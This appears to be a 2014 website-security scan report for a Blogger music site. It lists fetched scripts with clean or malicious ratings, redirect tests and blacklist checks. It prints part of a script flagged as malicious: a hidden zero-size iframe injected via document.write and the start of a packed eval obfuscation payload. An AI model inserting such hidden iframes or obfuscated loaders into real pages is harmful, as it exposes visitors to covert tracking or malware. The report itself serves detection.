Scanned pages/files
Request | Server response | Status |
http://obaudosrockers.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 09 Oct 2014 19:51:34 GMT Location: http://www.obaudosrockers.com/ Server: ghs Content-Length: 227 Content-Type: text/html; charset=UTF-8 Alternate-Protocol: 80:quic,p=0.01 X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block | clean |
http://www.obaudosrockers.com/ | 200 OK Content-Length: 103006 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.anunciad.com.br <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'> <head> <link href='http://fonts.googleapis.com/css?family=Marck+Script|Pinyon+Script|Kristi|Salsa' rel='stylesheet' type ...[3839 bytes skipped]... | ||
https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://ads.egrana.com.br/anuncio/popup/10203 | 200 OK Content-Length: 6554 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe style="display:none" src="http://ads.egrana.com.br/stats/pop/" width="0" height="0" frameborder="0" marginwidh="0" marginheight="0" scrolling="no"></iframe>');eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+' Antivirus reports:
| ||
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12600 Content-Type: application/javascript | clean |
http://tweetmeme.com/i/scripts/button.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=86400 Connection: close Date: Thu, 09 Oct 2014 19:51:39 GMT Location: http://tweetmeme.com/ Server: nginx Content-Length: 178 Content-Type: text/html Expires: Fri, 10 Oct 2014 19:51:39 GMT X-Served-By: h03 | clean |
http://tweetmeme.com/ | 200 OK Content-Length: 1833 Content-Type: text/html | clean |
http://tweetmeme.com/js/vendor/jquery-1.9.1.min.js | 200 OK Content-Length: 92630 Content-Type: application/x-javascript | clean |
http://tweetmeme.com/i/scripts/js/main.js | 404 Not Found Content-Length: 564 Content-Type: text/html | clean |
http://tweetmeme.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=86400 Connection: close Date: Thu, 09 Oct 2014 19:51:40 GMT Location: http://tweetmeme.com/ Server: nginx Content-Length: 178 Content-Type: text/html Expires: Fri, 10 Oct 2014 19:51:40 GMT X-Served-By: h03 | clean |
http://static.ak.fbcdn.net/connect.php/js/FB.Share | 200 OK Content-Length: 165813 Content-Type: application/x-javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21308 Content-Type: text/javascript | clean |
http://www.anunciad.com.br/table_ad.jsp?partner=4568 | 200 OK Content-Length: 1769 Content-Type: text/html | clean |
https://www.blogger.com/static/v1/widgets/2271878333-widgets.js | 200 OK Content-Length: 90737 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: obaudosrockers.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 09 Oct 2014 19:51:34 GMT
Location: http://www.obaudosrockers.com/
Server: ghs
Content-Length: 227
Content-Type: text/html; charset=UTF-8
Alternate-Protocol: 80:quic,p=0.01
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
...227 bytes of data.
GET / HTTP/1.1
Host: obaudosrockers.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 09 Oct 2014 19:51:34 GMT
Location: http://www.obaudosrockers.com/
Server: ghs
Content-Length: 227
Content-Type: text/html; charset=UTF-8
Alternate-Protocol: 80:quic,p=0.01
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
...227 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: obaudosrockers.com
Referer: http://www.google.com/search?q=obaudosrockers.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: obaudosrockers.com
Referer: http://www.google.com/search?q=obaudosrockers.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=obaudosrockers.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://obaudosrockers.com/
Result: obaudosrockers.com is not infected or malware details are not published yet.
Result: obaudosrockers.com is not infected or malware details are not published yet.